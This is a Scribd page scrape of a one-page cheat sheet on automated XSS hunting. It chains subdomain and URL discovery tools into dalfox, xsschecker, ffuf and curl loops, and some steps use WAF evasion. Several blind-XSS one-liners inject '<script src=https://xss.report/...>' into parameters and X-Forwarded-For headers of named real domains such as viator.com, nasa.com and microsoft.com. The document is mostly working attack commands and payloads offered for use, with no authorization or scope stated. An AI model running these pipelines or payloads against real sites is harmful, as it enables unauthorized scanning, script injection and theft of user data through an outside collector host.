0% found this document useful (0 votes)
83 views1 page

Xss Automation

The document outlines a comprehensive process for subdomain enumeration and URL discovery, utilizing various tools like httpx-toolkit, gau, waybackurls, and katana. It details steps for URL processing, including filtering for alive URLs, identifying potential XSS vulnerabilities, and executing payloads for testing. Additionally, it provides commands for blind XSS attacks and mentions the use of premium tools like knoxl for enhanced capabilities.

Uploaded by

signup.php
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
83 views1 page

Xss Automation

The document outlines a comprehensive process for subdomain enumeration and URL discovery, utilizing various tools like httpx-toolkit, gau, waybackurls, and katana. It details steps for URL processing, including filtering for alive URLs, identifying potential XSS vulnerabilities, and executing payloads for testing. Additionally, it provides commands for blind XSS attacks and mentions the use of premium tools like knoxl for enhanced capabilities.

Uploaded by

signup.php
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 1

first do Subdomain Enumeration

Live Subdomain Detection


cat subdomains.txt | httpx-toolkit -ports 80,443,8080,8000,8888 -threads 200 >
subdomains_alive.txt

URL Discovery:
cat subdomains_alive.txt | gau > gau.txt
cat subdomains_alive.txt | waybackurls > way.txt
urlfinder -list subdomains_alive.txt -o urlfinder.txt
cat subdomains_alive.txt | hakrawler > hakrawler.txt
katana -u subdomains_alive.txt -d 5 | tee katana.txt
katana -u subdomains_alive.txt -d 5 waybackarchive,commoncrawl,alienvault -kf -jc -
fx -ef js,css,png,svg,jpg,woff2,jpeg,gif,svg | tee ks.txt
paramspider -d nasa.com | tee paramspider.txt
waymore -i microsoft.com | tee waymore.txt

URL Processing:
1. cat allurls.txt gau.txt hakrawler.txt katana.txt urlfinder.txt way.txt
paramspider.txt waymore.txt | tee urls.txt
2. cat urls.txt | uro | tee uro.txt
cat uro.txt | subprober -ra -das -to 3000 -nc -o alive-urls.txt -c 20
cat alive-urls.txt | grep = | tee aliveparam.txt
cat aliveparam.txt | gf xss | uro | Gxss | kxss | tee xss_output.txt
cat xss_output.txt | grep -oP 'URL: \K\S+' | sed 's/=.*/=/' | sort -u > final.txt
use loxs XSS
Use dalfox: cat final.txt | dalfox pipe
cat final.txt | dalfox pipe --waf-evasion --worker 10
for Blind Xss : cat final.txt | dalfox pipe -b your bxss payload
one line Blind xss command : subfinder -d viator.com | httpx-toolkit -silent |
katana -f qurl | gf xss | bxss -appendMode -payload '"><script
src=https://xss.report/c/tanvir6197></script>' -parameters

subfinder -d example.com | gau | bxss -payload ''><script


src=https://xss.report/c/coffinxp></script>' -header 'X-Forwarded-For'

one line xss command : echo 'example.com ' | gau | qsreplace


'<sCript>confirm(1)</sCript>' | xsschecker -match '<sCript>confirm(1)</sCript>' -
vuln

ffuf -request xss -request-proto https -w /root/wordlists/xss-payloads.txt -c -mr


'<script>alert('XSS')</script>’

gau -t 50 example.com | grep '=' | qsreplace '"><img src=x onerror=alert(1)>' |


while read url; do curl -s "$url" | grep -q '<img src=x onerror=alert(1)>' && echo
"[+] XSS: $url"; done

if anyone use knoxl premium :


cat waymore.txt | gf xss | urless| anew xss
knoxnl -i xss -X BOTH

You might also like